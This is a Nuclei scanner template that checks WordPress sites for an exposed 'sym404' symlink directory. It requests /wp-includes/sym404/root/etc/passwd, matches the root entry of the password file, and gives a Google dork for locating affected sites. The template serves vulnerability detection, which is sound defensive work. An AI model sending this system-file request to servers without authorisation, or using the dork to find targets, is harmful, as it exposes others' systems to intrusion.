nuclei-templates/http/vulnerabilities/wordpress/wp-sym404.yaml

35 lines
963 B
YAML

id: wp-sym404
info:
name: Wordpress sym404 directory
author: pussycat0x
severity: high
description: Searches for sensitive directories present in the sym404.
reference:
- https://twitter.com/momika233/status/1540325055280070656
classification:
cpe: cpe:2.3:a:wpvnteam:wp_extra:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
vendor: wpvnteam
product: wp_extra
google-query: inurl:"/wp-includes/sym404/"
tags: wordpress,listing,wp,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-includes/sym404/root/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100f2f169aaf5a1cc7dde021f497cead419b65cedc353f8546163e47286781f355c022100902bcdb31a6d8ee7ef3947c82e6e1d3fa770dbbbda0d85442bd11a95056b490c:922c64590222798bb761d5b6d8e72950